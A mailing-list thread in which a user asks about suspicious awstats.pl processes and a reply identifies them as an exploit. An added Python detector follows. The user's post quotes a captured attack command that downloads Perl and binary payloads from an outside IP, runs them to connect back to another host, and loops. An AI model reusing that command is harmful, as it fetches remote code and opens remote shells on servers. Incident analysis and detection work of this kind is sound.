Hello Kelsey,

awstats has a good history of exploits against it, and it appears to be commonly exploited in Red Hat systems. Unless that's you downloading "ping.txt" or "ping" -- which is apparently a Perl exploit that most likely takes an IP address and port for its two arguments -- those logs (or at least, set of commands) look like exploit attempts.


-Paul Patrick C. Prantilla

Kelsey Hartigan Go wrote:
Any vulnerability in awstats.pl?

I suddenly have these processes running...

6086 ?        S      0:00 /usr/bin/perl /var/www/cgi-bin/awstats.pl
6087 ?        R     81:06 sh -c echo ;echo b_exp;wget
http://219.84.105.36/ping
.txt;mv ping.txt temp2006;perl temp2006 220.227.100.4 3303;wget
http://219.84.10
5.36/ping;chmod +x ping;./ping 220.227.100.4 3303;curl -o ping
http://219.84.105
.36/ping;chmod +x ping;./ping 220.227.100.4 3303;cd /tmp/;curl -o temp2006
http:
//219.84.105.36/ping.txt;while [ 1 ];do perl temp2006 220.227.100.43303;done;wg et http://219.84.105.36/ping;chmod +x ping;./ping 220.227.100.4 3303;curl -o
pin
g http://219.84.105.36/ping;chmod +x ping;./ping 220.227.100.4 3303;echo
e_exp;%
00/awstats.w.x.y.z.conf

where w.x.y.z is my public ip...

anybody know what this is and what it's trying to do...


------------------------------------------------------------------------

_________________________________________________
Philippine Linux Users' Group (PLUG) Mailing List
[email protected] (#PLUG @ irc.free.net.ph)
Read the Guidelines: http://linux.org.ph/lists
Searchable Archives: http://archives.free.net.ph
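
Added example (not part of the original thread, and not awstats code): a Python check that scans `ps` output for the pattern visible in the listing above, namely a `sh -c` process that fetches a file, runs it, and ends in an awstats config path. The indicator names, the `min_hits` threshold, and the sample listing with its documentation-range addresses are assumptions constructed for illustration.

```python
import re

# Constructed sample of `ps ax` output, modelled on the listing in the thread.
# All addresses are documentation-range placeholders, not the ones from the post.
SAMPLE_PS = """\
 6086 ?        S      0:00 /usr/bin/perl /var/www/cgi-bin/awstats.pl
 6087 ?        R     81:06 sh -c echo ;echo b_exp;wget http://192.0.2.10/ping.txt;mv ping.txt temp2006;perl temp2006 198.51.100.4 3303;echo e_exp;%00/awstats.203.0.113.5.conf
 6120 ?        S      0:01 /usr/sbin/httpd
 6201 ?        S      0:00 sh -c /usr/bin/logrotate /etc/logrotate.conf
"""

# PID, TTY, STAT, TIME, then the full command line.
PS_LINE = re.compile(r"^\s*(\d+)\s+(\S+)\s+(\S+)\s+(\d+:\d+)\s+(.*)$")

# Hypothetical indicator set derived from what the posted command line shows.
INDICATORS = {
    "shell_wrapper": re.compile(r"^(?:/bin/)?(?:ba)?sh\s+-c\b"),
    "fetch_tool": re.compile(r"(?:^|[;|&\s])(?:wget|curl)\s"),
    "run_fetched": re.compile(r";\s*(?:chmod\s+\+x\s|perl\s+\S+|\./\S+)"),
    "exp_markers": re.compile(r"\becho\s+[be]_exp\b"),
    "awstats_conf_tail": re.compile(r"awstats\.\S*conf\s*$"),
    "retry_loop": re.compile(r"while\s*\[\s*1\s*\]"),
}


def scan_ps(text, min_hits=3):
    """Return suspicious processes: a shell wrapper plus other indicators."""
    findings = []
    for line in text.splitlines():
        m = PS_LINE.match(line)
        if not m:
            continue
        pid, _tty, _stat, cpu_time, cmd = m.groups()
        hits = sorted(n for n, rx in INDICATORS.items() if rx.search(cmd))
        # Require the sh -c wrapper so ordinary wget/curl use is not flagged.
        if "shell_wrapper" in hits and len(hits) >= min_hits:
            findings.append({"pid": int(pid), "cpu_time": cpu_time, "hits": hits})
    return findings


if __name__ == "__main__":
    for f in scan_ps(SAMPLE_PS):
        print(f"PID {f['pid']} (CPU {f['cpu_time']}): {', '.join(f['hits'])}")
```

Feed it a live listing with `ps ax | python3 script.py` after swapping `SAMPLE_PS` for `sys.stdin.read()`; a hit means the web server user ran attacker-supplied shell, so treat the host as compromised rather than just killing the process.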